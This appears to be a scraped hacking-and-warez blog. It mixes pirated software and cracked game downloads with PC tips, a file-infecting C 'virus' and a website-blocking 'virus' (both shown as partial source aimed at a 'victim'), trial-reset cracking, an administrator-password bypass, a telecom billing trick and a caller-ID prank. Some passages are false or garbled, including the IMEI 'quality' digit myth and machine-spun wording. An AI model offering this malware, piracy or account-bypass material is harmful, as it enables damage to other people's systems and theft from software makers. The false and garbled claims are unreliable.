5000 Professional Fonts

                                                 |5000 Professional Fonts |
Here is a collection of 5000 fonts that can be used with many windows applications

Hotfile Download Link-

Download

Size 200 mb

Collection of graphics software from AMS Software RePack

Collection of graphics software from AMS Software RePack by Wadimus (13.03.2011) ENG/RUS | 731 MB
Package for processing photos is a set of fast and convenient program for editing and processing images. The set includes both known and time-tested software and the latest programs created over the past six months. This package has everything you need for working with photos, many problems can be solved here is much simpler and more convenient than other products.

The collection consists of a short list of 31 Unattended (silent installation) graphics software from AMS Software, collected in a single shell.

Program List
Beauty Studio v.1.75
Frame Maker Pro NeRuss v.3.81
Framing Studio Pro v.2.81
Home Photo Studio NeRuss v.2.65

BSR Screen Recorder 4.4.3



BSR Screen Recorder 4.4.3 | 27.01 MB Captures video, sound and pictures of anything you see on your screen. Any part of the screen, any window on the screen or the entire desktop can be recorded. You can record your web cam sessions, favorite games, any software on your desktop, any video display on your screen, record audio of what you hear from your speakers, use BSR for your business solutions, prepare video presentations, tutorials.

Features:

Prince of Persia: Warrior Within PC



Prince of Persia: Warrior Within is a video game and sequel to Prince of Persia: The Sands of Time. Warrior Within was developed and published by Ubisoft, and released on December 2, 2004 for the Xbox, PlayStation 2, GameCube, and Microsoft Windows. It picks up where The Sands of Time left off, adding new features, specifically, options in combat. The Prince now has the ability to wield two weapons at a time as well as the ability to steal his enemies' weapons and throw them. The Prince's repertoire of combat moves has been expanded into varying strings that allow players to attack enemies with more complexity than was possible in the previous game. 

Warrior Within has a darker tone than its predecessor adding in the ability for the Prince to dispatch his enemies with various finishing moves. In addition to the rewind, slow-down, and speed-up powers from The Sands of Time, the Prince also has a new sand power: A circular "wave" of sand that knocks down all surrounding enemies, it is the first "Prince of Persia" game to be rated M by the ESRB.

Latest collection of funny images - have fun


Here are the collection of very funny wallpapers for your desktop and mobile phones. Download them and set as a wallpaper on your desktop and mobile. You can download the wallpapers or all wallpapers in one folder by clicking on the download button...

Download it from here

Off Road Racers



Minimum requirements:
-Min System:1 GHz or equivalent
-RAM:128-256 MB
-Video Memory:32 - 64 MB
-Hard Drive Space:2200 MB
-OS:2000 / XP /7

Software Collection of 2011 Mega Pack (500 in 1)


Here is the great collection of most wanted softwares of 2011.. must download


The Best Software Collection of 2011 Huge Mega Pack (500 in 1) | 7GB | 2 Links
Genre: All In One (AIO)

In every software included infos.

Ashampoo Burning Studio V9.12 Serial
Avast Anti-Virus v4.8.1296.0 Serial

1000 Java Mobile Games



899 Java Mobile Games | 177 Mb
These Are jar.Files Only Java uploads Mobiles Can Play these games.
Install Instructions :
1. Connect Mobile with PC.
2. Copy jar.File in your mobile.
3. Install files in your Mobile.
Download link
http://www.mediafire.com/?gqytwdweabx8n
Password Mediafire :

andystonecold

WWE SmackDown VS RAW 2011 Game for PC Full Version Free Download

WWE SmackDown vs. Raw 2011  is a professional wrestling video game developed by Yuke's and published by THQ.It was released on October 26, 2010 in North America, October 28, 2010 in Australia and October 29, 2010 in Europe. The game is based on the two brands of WWE, Raw and SmackDown.

GTA III - grand theft auto free download


GTA III (PC/Eng/Full ISO) | 900 MB

Screenshots:-



Minimum System Requirements:
  • Pentium III 450 CPU
  • 96MB RAM
  • 16MB Direct3D Video Card
  • Fully DirectX compatible Sound Card
  • 8X CD-Rom
  • 500MB free hard disk space
  • Win 98/ME/2000/XP
  • Direct X 8.1
Mediafire Download Link:-




HD Games Collection (2011) (Android)



All Cracked HD Games Collection for Android (GAMELOFT) (SD+APK INCLUDED)
size: 1.3 GB


Asphalt 6
Asphalt 5
Assassins Creed
Brothers In Arms2
Dungeon Hunter
Dungeon Hunter 2
Fishing Kings
Gangstar: Miami Vindication
Gangstar: West Cost
GT Racing
Hero Of sparta
Avatar
Lets Golf
Lets Golf 2
Modern Combat Sand Storm
Modern Combat 2 Black Pegasus
NOVA
Oregon Trial
Real Football 2010
Real Football 2011
Shrek Kart
Spider Man
HAWX
Splinter Cell
UNO

Download

Get Full TuneUp Utilities 2012 for free


Hello guys today we bring you the all-in-one tool for cleaning, optimizing, customizing your PC.
Its none other than very popular TUNEUPUTILITIES of course the newer version i.e. 2012.
What Tuneup offers?
The easy and complete all-round PCoptimization workout. More than 30 tools guarantee PCs maintain peak performance when working, playing, and gaming. 
Even when not needed, background processes, services, and scheduled tasks will often be running. With the new TuneUp Program Deactivator, you can turn off programs on demand, completely automatically, thus reducing the demands on your PC. The result: that "Windows like it was on the very first day!" feeling. 

HOW TO DOWNLOAD TORRENT FILES WITH IDM



Hello Friends, hope you all are fine.
Today I'm with a very useful article.Downloading files from the Torrents site is easy and completely legal (unless you are downloading copyrighted files).Downloading speed from torrents depends upon

How to Install “Turbo C/C++” Compiler in Ubuntu Linux


Are you running first time Ubuntu Linux or not know even more in Linux/Ubuntu? Are you a student as only run tubo c/ c++ compiler in Microsoft Windows to create your projects/executable programs and not have better idea about how to execute various c, c++ programs in linux ubuntu. Then, yet you don’t think even more about how to execute c/c++ programs in linux/ubuntu as we are giving step to step tutorial about how to install “turbo c c++” compiler in Ubunu/Linux so that you can continue your work without any effort.
To install Turbo c c++ compiler in Ubuntu/Linux, you first need to install Dosbox Emulator under Linux/Ubuntu. So, go to Applications- Ubuntu Software Center

HOW TO RESET WINDOWS 7 OR VISTA PASSWORD




Hello friends,I hope you all are fine.Our memory becomes very weak now.We often remember our  dear ones and near ones.Inspite of this we have burden of remembering passwords of our internet services and computers.Here we'll  discuss on computers,So put Internet passwords aside.

AVG Anti-Virus Pro 2012 12.0.1891 Final Multilingual (x86/x64)



AVG Anti-Virus Pro 2012 12.0.1891 Final Multilingual (x86/x64)


AVG Anti-Virus Pro 2012 12.0.1891 Final Multilingual (x86/x64) | 151/169 MB

AVG Anti-Virus Pro 2012 - New version of famous antivirus program from Czech developer to protect your PC from dangerous objects and network threats. Program blocks viruses, trojans, worms, spyware, and a module to deal with rootkits helps get rid of the malicious processes, masking the virus. Compatible with Windows Vista and Windows 7.


AVG - popular anti-virus software for home use. Certified manufacturer of rapid virus database updates, ease of use, low system requirements - the main benefits of the products AVG. AVG anti-virus software provides powerful protection against viruses and spyware in Windows 7, Vista and XP. AVG products are designed to combat the threat of infecting your computer and data loss.

Advantages of products AVG:

Download BCA III SEMESTER PaPer

                     Download BCA III SEMESTER (JNVU) OLD  EXAMINATION PAPER

                     For Download

                     Click Here

Operating System Hindi Notes


ओप्रटिंग सिस्टम हिंदी नोट्स PDF फाइल डाउनलोड करे

Download Cricket Ticker And Get free Live Score



A cricket match is going on and you are away from TV-Radio OR missing the excitement of match at your work place.
Dont worry ! Here is the Solution -mukeshgodha.blogspot.com
This is a small and easy to use application. It shows ball-by-ball updates of live matches on your computer screen.
So what are you waiting for ? Just download it quickly and stay connected with match scores anytime, anywhere !!!
                                 For Download Click here{in win7/xp/NT}
                                                                                                                                                                                                                                                      




BCA FIRST SEM (JNVU) UPDATED SYLLABUS FROM 2010 TO PRESENT

BCA FIRST SEM (JNVU)  UPDTED SYLLABUS FROM 2010 TO PRESENT BATCHS



FOR DOWNLOAD PDF FILE  CLICK HERE

GET READY FOR 4G SERVICES IN 2013


4G services, the next generation of mobile telephony, may hit the country next year.

While some telecom operators in the country have already been carrying out trials for the launch ofthe next generation of mobile services, the process got an additional impetus yesterday with the telecom sector regulator, the Telecom Regulatory Authority of India (TRAI), releasing a consultation paper to usher in the next era of high-speedwireless services.

The last date for written comments on this consultation paper is September 20 and September 27 for counter-comments.

How to Create a Computer Virus using c Language?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
 
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)

Is your Nokia Cell Phone Original

Nokia is one of the largest selling phones across the globe. Most of us own a Nokia phone but are unaware of it’s originality. Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially meant for you. Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.
Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).
Then check the 7th and 8th numbers
Phone serial no. x x x x x x ? ? x x x x x x x

IF the Seventh & Eighth digits of your cell phone are 02 or 20 this means your cell phone was assembled in Emirates which is very Bad quality
IF the Seventh & Eighth digits of your cell phone are 08 or 80 this means your cell phone was manufactured in Germany which is fair quality
IF the Seventh & Eighth digits of your cell phone are 01 or 10 this means your cell phone was manufactured in Finland which is very Good
IF the Seventh & Eighth digits of your cell phone are 00 this means your cell phone was manufactured in original factory which is the best Mobile Quality
IF the Seventh & Eighth digits of your cell phone are 13 this means your cell phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your health.

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
Here is the sourcecode of the virus.

#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};

How Firewalls Work


How Firewalls WorkIf you have been using Internet on a regular basis or working in a large company and surf the Internet while you are at work, you must have surely come across the term firewall. You might have also heard of people saying “firewalls protect their computer from web attacks and hackers” or “a certain website has been blocked by firewall in their work place”. If you have ever wondered to know what exactly is this firewall and how it works, here we go. In this post I will try to explain “How firewalls work” in a layman’s terms.

Hack Software and Run the Trial Program Forever


In this post I’ll show you how to hack a Software and run the trial program forever. Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?
Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares. I’ll try to explain this in brief.

How to Save Bookmarks in IE, Firefox, Chrome and Opera


Save BookmarksHow would you like to save your bookmarks in IE, Firefox, Opera and Google Chrome so that you can restore them in case if you need to re-install your operating system or move them from one computer to another? This post will show you how to save and restore bookmarks in simple steps.
Bookmarking the favorite web pages can save a lot of time as it becomes almost impossible to remember a list of favorite websites and their URLs. However it can be really frustrating at times when you lose all those saved bookmarks in case if a computer crashes. Also if you are a person who uses more than one computer then it becomes hard to copy all those saved bookmarks one by one manually. So saving the bookmarks can become handy in such situations. Here is how to to do it.

How to Write-Protect USB Flash Drive

 
USB Write ProtectMany a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.

10 Tips for a Total Online Security

With the sudden rise in the Internet usage across the globe over the past few years, there has also been a rise in the amount of online scams and frauds. Today most of the Internet users are unaware of the most prevailing online threats which pose a real challenge for their safe Internet usage. As a result, Online Security has become a questionable factor for the most Internet users. However it is still possible to effectively combat online insecurity provided that the users are well aware of the common scams and frauds and know how to protect themselves. A study shows that over 91% of the Internet users are unaware of the online scams and are worried about their security. Well if you are one among those 91% then here is a list of 10 tips to ensure your total online security.



 
1. Always install a good antivirus software and keep it up-to-date. Also install a good anti-spyware to keep your PC away from spywares. Click Here for a list of recommended anti-spyware softwares.
 
2. Always visit known and trusted websites. If you are about to visit an unknown website, ensure that you do not click on suspectable links and banners.
 
3. Perform a virus scan on the files/email attachments that you download before executing them.
 
4. Regularly Update your operating system and browser software. For a better security it is recommended that you surf the Internet through the latest version of your browser program.
 
5. Never share your password (email, bank logins etc.) with any one for any reason. Choose a strong password (A blend of alphanumeric+special symbols) and change it regularly, eg. every 3 months. Avoid using easy-to-guess passwords. (ex. pet’s name or kid’s name)
 
6. Always type the URL of the website in your browser’s address bar to enter the login pages. For ex. To login to your Gmail account type http://mail.google.com 
 
7. Before you enter your password on any login page, ensure that you see https instead of http. ex. https://mail.google.com instead of http://mail.google.com. HTTPS protocol implements SSL (Secure Sockets Layer) and provide better security than a normal HTTP. For more information on HTTPS and SSL see Know More About Secure Sockets Layer (SSL).
 
8. Beware of phishing emails! Do not respond to any email that request you to update your login details by clicking on a link in the body of the email. Such links can lead to Fake Login Pages (Spoofed Pages). For more information on phishing refer What is Phishing?. Also refer How to Protect an Email Account from being Hacked.
 
9. Always hit the logout button to close your login session rather than abruptly terminating the browser window. Also clear your web browser caches after every session to remove the temporary files stored in the memory and hard disk of your PC.
 
10. Avoid (Stop) using any public computers or computers in the Internet cafes to access any sensitive/confidential information. Also avoid such computers to login to your email/bank accounts. You cannot be sure if any spyware, keystroke-logger, password-sniffer and other malicious programs have not been installed on such a PC.
 
By following the above 10 tips your online security can be guaranteed upto 90%. I hope this will help my readers for keeping themselves safe from any of the online insecurities. Cheers! Pass your comments.

How to Recover Hacked Email Accounts?

How to Recover Hacked Email Accounts?

 
Email Hacked?
It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out. In this post you will find the possible ways and procedures to get back your hacked email account.
 

For Gmail:

 
It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.
Step -1: Try resetting your password since it is the easiest way to get your account back in action. In this process Google may ask you to answer the secret question or may send the password reset details to the secondary email address associated with your compromised account. You can reset you password from the following link
If you cannot find success from the Step-1 then proceed to Step-2.
 
Step-2: Many times the hacker will change the secret question and secondary email address right after the account is compromised. This is the reason for the Password Reset process to fail. If this is the case then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like
1. Email addresses of up to five frequently emailed contacts
2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…
You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However you need to figure out the closest possible date/answers and fill out this form. This is your last chance! The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link
 

For Yahoo and Hotmail:

 
Unfortunately for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions that you have setup or reset the password using the secondary email option. 
To initiate the password reset process just click on the Forgot password link in your login page and proceed as per the screen instructions.
 
I hope this post will help you recover the lost account. I highly recommend that you also read my post on How to protect your email account from being hacked and Tips to find unauthorized activity on your Gmail account so that you always stay protected!

How To make your own Radio Station

How To make your own Radio Station ...

::Must HAVE Winamp (Any Version)::

First, things First your speed has to be at least 256/64 kbps (which means Dial-up users, will have alot of latency, just dnt bother)

Disable Windows Logo Key

i was recently playing games and this nasty windos logo key keep annoying me , cause i often accidently clicked it , and i start to search a solution to solve my problem, and found the following article in microsfot website, and it did work, hope this helps, thanks!

ALL About Spyware

There are a lot of PC users that know little about "Spyware", "Mal-ware", "hijackers", "Dialers" & many more. This will help you avoid pop-ups, spammers and all those baddies.

What is spy-ware?
Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer them to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee.

Known spywares
There are thousands out there, new ones are added to the list everyday. But here are a few:
Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

How to check if a program has spyware?
The is this Little site that keeps a database of programs that are known to install spyware.

Check Here: http://www.spywareguide.com/product_search.php

If you would like to block pop-ups (IE Pop-ups).
There tons of different types out there, but these are the 2 best, i think.

Try: Google Toolbar (http://toolbar.google.com/) This program is Free
Try: AdMuncher (http://www.admuncher.com) This program is Shareware

If you want to remove the "spyware" try these.
Try: Lavasoft Ad-Aware (http://www.lavasoftusa.com/) This program is Free
Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.

Try: Spybot-S&D (http://www.safer-networking.org/) This program is Free
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.

Try: BPS Spyware and Adware Remover (http://www.bulletproofsoft.com/spyware-remover.html) This program is Shareware
Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you'd like to remove.

Try: Spy Sweeper v2.2 (http://www.webroot.com/wb/products/spysweeper/index.php) This program is Shareware
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.
The best scanner out there, and updated all the time.

Try: HijackThis 1.97.7 (http://www.spywareinfo.com/~merijn/downloads.html) This program is Freeware
Info: HijackThis is a tool, that lists all installed browser add-on, buttons, startup items and allows you to inspect them, and optionally remove selected items.


If you would like to prevent "spyware" being install.
Try: SpywareBlaster 2.6.1 (http://www.wilderssecurity.net/spywareblaster.html) This program is Free
Info: SpywareBlaster doesn`t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.

Try: SpywareGuard 2.2 (http://www.wilderssecurity.net/spywareguard.html) This program is Free
Info: SpywareGuard provides a real-time protection solution against so-called spyware. It works similar to an anti-virus program, by scanning EXE and CAB files on access and alerting you if known spyware is detected.

Try: XP-AntiSpy (http://www.xp-antispy.org/) This program is Free
Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people.

Try: SpySites (http://camtech2000.net/Pages/SpySites_Prog...ml#SpySitesFree) This program is Free
Info: SpySites allows you to manage the Internet Explorer Restricted Zone settings and easily add entries from a database of 1500+ sites that are known to use advertising tracking methods or attempt to install third party software.

If you would like more Information about "spyware".
Check these sites.
http://www.spychecker.com/
http://www.spywareguide.com/
http://www.cexx.org/adware.htm
http://www.theinfomaniac.net/infomaniac/co...rsSpyware.shtml
http://www.thiefware.com/links/
http://simplythebest.net/info/spyware.html

Usefull tools...
Try: Stop Windows Messenger Spam 1.10 (http://www.jester2k.pwp.blueyonder.co.uk/j...r2ksoftware.htm) This program is Free
Info: "Stop Windows Messenger Spam" stops this Service from running and halts the spammers ability to send you these messages.

----------------------------------------------------------------------------
All these softwares will help remove and prevent evil spammers and spywares attacking your PC. I myself recommend getting "spyblaster" "s&d spybot" "spy sweeper" & "admuncher" to protect your PC. A weekly scan is also recommended

Free Virus Scan
Scan for spyware, malware and keyloggers in addition to viruses, worms and trojans. New threats and annoyances are created faster than any individual can keep up with.
http://defender.veloz.com// - 15k


Finding . is a Click Away at 2020Search.com
Having trouble finding what you re looking for on: .? 2020Search will instantly provide you with the result you re looking for by drawing on some of the best search engines the Internet has to offer. Your result is a click away!
http://www.2020search.com// - 43k

10 reasons why PCs crash

10 reasons why PCs crash U must Know

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

Copy one User Account into Another Account in your Windows System

Hi friends,hope everyone fine!As i said already in my yesterday post i want to present a series of Pc / Laptop tricks,ie)atleast one per day along with other Topic posts.

Have you ever faced this problem ?
unable to
access certain files, ...unable to
Right Click,unable to install new programs,or unable to see
certain applications or utilities?
Once you have
eliminated any type of
malicious infection, the next
thing may be you have to
create another User Account right?

how do you transfer all the files from
old account to the new
account?

This may sounds big but its relatively easy
process. Follow these steps
and you should have no
problem: -

- Open Control Panel and click
on *User Accounts*

- Click on Create a new
account - Label this User Account
anything you want

- Set the access for this User
Account and then click +Create
Account+

- Once you get back to the
main screen, repeat the
process. This time, you are
going to create a dummy
account. You will delete it
once this process is complete.

- Close the Control Panel

- Restart the computer

- When you get to the Log

-In
screen, log into the User
Account that you
created...not the dummy
account

- When the computer restarts
Right Click on My Computer and click +Properties+

- Click on the Advanced tab

- Within the User Profiles section, click +Settings+

- Within this section, you can
copy all the data from one
account to another. Highlight
the original User Account, the
one that was causing
problems, and click +Copy To+

- A browse window will open
and navigate to the User
Account you are currently
using. (C:/Documents and
Settings/User Account)

- Once you click OK, you will
get a disclaimer message
telling you that files are about
to be copied. Once the process
starts, *do not do anything
until it is complete*. The larger the original account, the
longer it will take to complete
the copy.

- Once the copy is complete,
you will be able to click OK
twice to close the windows

- Open Control Panel again and
click on *User Accounts*

- Delete both the original User
Account and the dummy
account.

I know this seems to involve a lot of
steps but,it will
save you a lot of time,
and potentially money,
reinstalling Windows!

Facebook Launched Video Chat With Skype Partnership

Finally, Facebook launched video Chat feature.It has partnered with skype for video chat.Facebook has started to feel the heat of competition as Google+ which was launched a week earlier has already features like Group Video chat  and now facebook is trying to play the catch up game.
How to use Facebook Video Chat?
Before you start using facebook Video Chat you will need to install the video chat setup
  • Go To  Facebook Video Chat Setup page
  • Click on Get Started button
  • Now,It will Download the setup for video chat.
  • After the download is complete click on the setup to install the video chat feature.
  • Once the installation is complete a video calling button will start appearing in your chat window.

how to cr@ck Administrator's password see here

firstly start ur pc and it will ask for pass then here is the trick for it 
#1 boot into safe mode (press F8 before windows starts),

#2 log onto the account named "administaor" NOT your normal account

#3 go into control panal and remove password from user account settings...

how to Update nokia phones software

Tips for Exam

Exams. Everybody hates, if you like them you must be boring . But since you have asked for tips that means you aren’t. Here are a few tips that can help you do well in exams.

1. TAKE HELP FROM TEACHER

Before examinations ask from your teacher the important topics that might come in question paper.If she/he says that everything is important ,then ask for previous years question papers.Most of the times, same questions are asked indirectly.

2. REVISE

While studying ,there are something that don’t get drilled in your brain like maths’ formulae and sciences diagrams or facts or figures etc.Mark R (for revise) in red .And before exam like a night before ,look again at them.

3. DON’T LEAVE FOR FUTURE

Many a times ,when we find something difficult,we leave it for future .And we never do it ,so never delay any topic .Learn it as it comes.But during exam time,do exactly opposite.Attempt those questions first that you know for sure and difficult ones later.

4. WRITE BEAUTIFULLY

Teacher’s get tired checking test papers .And whenever a test paper comes with beautiful handwriting,it becomes easier to check and rewards you extra marks for your handwriting.

5. MUST DO DIAGRAMS

Especially in science,where diagrams are common you must draw diagrams beautifully and label them neatly.You will be rewarded

6. HAVE HEALTHY BREAKFAST

On d-day ,you must have a healthy break fast.There is a superstition that on exam day one must have curd in breakfast.Must try it.

7. DON’T LEAVE ANY QUESTION

While attempting one must do all the questions .I f you don’t know anything ,you must write anything about the topic from which question has come.But do these things in the end of paper sheet.

8. TAKE A BREAK

During the paper ,though teachers don’t give you any break but one must give some break to you.

Reimage Repair Review – Read About Reimage and The PC Performance Analysis

My computer has been acting kind of sluggish and congested, my windows would take perpetually to open and it was nearly impossible to browse websites or play any games – things would just take too long! So I figured possibly I had a virus or some malware on my computer distressing performance. I did a quest for a free PC performance analyzer, one that would also scan my computer for malware. I came diagonally Reimage through a authorize in a forum and it did just that.

Top Ten Antivirus 2011

Most Antivirus companies have by now unhindered their newest software, the 2011 version of their antivirus software. In view of the fact that the numbers of viruses over the internet are exceeding to the unbearable limits, antivirus companies are aggressively effective on their antivirus programs to provide the best wellbeing and thus building their way in the top ten antivirus 2011 worldwide. It was exceptionally appealing to test innumerable antivirus software on our lab computers. We infected our computer systems to completely test the capabilities of these antivirus programs. Among the best we found are the Bitdefender antivirus, Norton, F-Reliable, ESET Nod32 and Kaspersky antivirus 2011. Even as BitDefender antivirus 2011 continues to be the best antivirus software, Kaspersky is still the best antivirus and wellbeing software manufacturer for affair computers. Bitdefender and F-Reliable are both excellent for home and affair computers.

How to Trace a Website using Commands Prompt

Tracing or Routing a website using command prompt. This tip is only meant for educational purpose. I mainly use this trick to find out the hosting provider where a particular domain is hosted.
Follow the below steps:
1.   Start->Run->CMD  ie; open Command prompt
2.  Type the following command and press enter.
tracert www.<websitename>.com
e.g tracert www.facebook.com
In the above command, enter the desired website name.
Once you press enter, it tell you where a particular domain is hosted, Location, Country and some details of that domain.

How to increase Airtel GPRS Speed

his trick is about how to increase the speed of airtel dsl DNS servers so that we experience increased speed in gprs and airtel broadband connections.since sometimes it tooks about 4 seconds for a query or it gets timed up due to the overload of the airtel server.
So i started using OpenDSN server -which is a free and powerful DNS service. Use following DNS server address:
Code:
Preferred DNS server: 208.67.222.222
Alternate DNS Server: 208.67.220.220
HOW TO DO THIS:
1. Click on Start button > Settings > Control Pannel> Arrangement Relations
2. Aptly click on YOUR “airtel dialup tie” or your Internet tie,
Click on Properties pin.
3. iN general TAB, Select Internet Protocol (TCP/IP)
4. Click on Properties pin and Look for Ideal DNS Ma?tre d’h?tel:
5. Penetrate the following values there,
- 208.67.222.222
- 208.67.220.220
AND KEEP….OBTAIN IP ADDRESS AS AUTOMATIC.

Trace Mobile Number Location & Missed Calls [India Only]

Web Based
Mobile Digit Locator is a very useful site which helps you to find out the Telecom Digit and Machinist Name of any fastidious given Digit for Free.
number-locator
All you need is to penetrate first 4 digit of the Mobile Digit E.g. 9981, without 0 (Zero) or +91
Mobile Based

Similarly a Java Based Free Mobile Software: Mobile Digit Locator is a very useful service. You will get ample information about any digit on your Mobile only. You can even locate any STD Code within India from your mobile phone itself without any GPRS Tie.

Get a power efficiency report in Window7

Have a laptop and want to get more battery life out of it? Windows 7 includes a hidden built-in tool that will examine your laptop's energy use and make recommendations on how to improve it. To use it:
1. Run a command prompt as an administrator. To do this, type cmd in the search box, and when the cmd icon appears, right-click it and choose "Run as administrator."
2. At the command line, type in the following:

Use hidden international wallpapers and themes in window7

When you first install Windows 7, it asks for your language, time and currency. Based on your responses, it installs a set of wallpapers and themes. If you choose English (United States) for your time and currency format, for example, the available desktop backgrounds and themes will include a United States section with scenery from locations such as Maine, the Southwest and so on.

VodafOne NEW TRICK Free 100 local/std sms TRfor 1Rs with NO VALIDITY

HI FRIENDS
ENJOY VODAFONE LATEST 2011 TRICK
WITH ME
VodafOne free 100 locAL/std sms trik
for 1Rs with NO VALIDITY:
1.send 'ACT BONUS 1' to 144
2.send one msg to any numbr
3.send 'CAN BONUS 1' to 144

Wan ppoe problem In Windows 7 and vista fix

connecting wan pppoe
problem in vista or
windows7

how to fix it
try this
in cmd

FREE CALL FROM HIDDEN NUMBER FOR PC

JUST GO TO
http://www.evaphone.com

YOU WILL SEE A PHONE
DIAL UP BOX .

How To Call Your Friends With Their Own Number(Very interesting)

How To Call Your Friends
With
Their Own Number....you
a
extremely Nice Prank or
you can simply say best trick. i.e"How
To Call
Your Friends From THeir
Own
Cell Number".
Mobile hack to call your friends:

Tips for Exam

Exams. Everybody hates, if you like them you must be boring . But since you have asked for tips that means you aren’t. Here are a few tips that can help you do well in exams.

1. TAKE HELP FROM TEACHER

Before examinations ask from your teacher the important topics that might come in question paper.If she/he says that everything is important ,then ask for previous years question papers.Most of the times, same questions are asked indirectly.

Install Windows xp Very Fast

Now, this tip will be very helpful for those who frequently install windows xp operating system. Normally OS installation takes around 40 minutes to complete, but through this trick you can now save 10-15 minutes. This simple tricks goes this way.

1. Boot through Windows XP CD.

Why Facebook Famous, Wealthy, A complete History of facebook

20, Mark Zuckerberg created Facebook. 26 years old, he was Time magazine named “ Person of the Year 2010.” Recently, Facebook is valued more than $ 80 billion. History of Facebook is not about a character virtue ambition to conquer the world, which is about a young computer enthusiasts, and somewhat shy. Mark Zuckerberg, born on 14/05/1984 in New York. Dated 28/10/2003, Zuckerberg is 19 years old, and is a second year student at Harvard University, has created pages Facemash, the forerunner of Facebook, from these data is the picture of student records Harvard. Main Zuckerberg was with the roommate and classmate, breaking into the network profile of Harvard University and the theft of photographs that record. Facemash quickly attracted 22,000 visitors with 450 pictures in just the first 4 hours online. But the management of Harvard University and has closed Facemash Zuckerberg accused of security breaches, information security field, invasion of privacy … . Zuckerberg continues to expand the project to 2/4/2004, he released “ Thefacebook” the domain name thefacebook.com. August 2005, Zuckerberg drop the word “ the” in the name and the URL of Facebook, after buying the domain name facebook. com for $ 200,000. Scrambling to invest in Facebook Facebook received the first $ 500,000 investment in 6 / 2004 from Peter Thiel, PayPal co-founder. Peter Thiel is Facebook’ s first bank and $ 500,000 investments that helped create “ Facebook phenomenon” today. Only a year later, Facebook received further investment from 12.7 million in venture
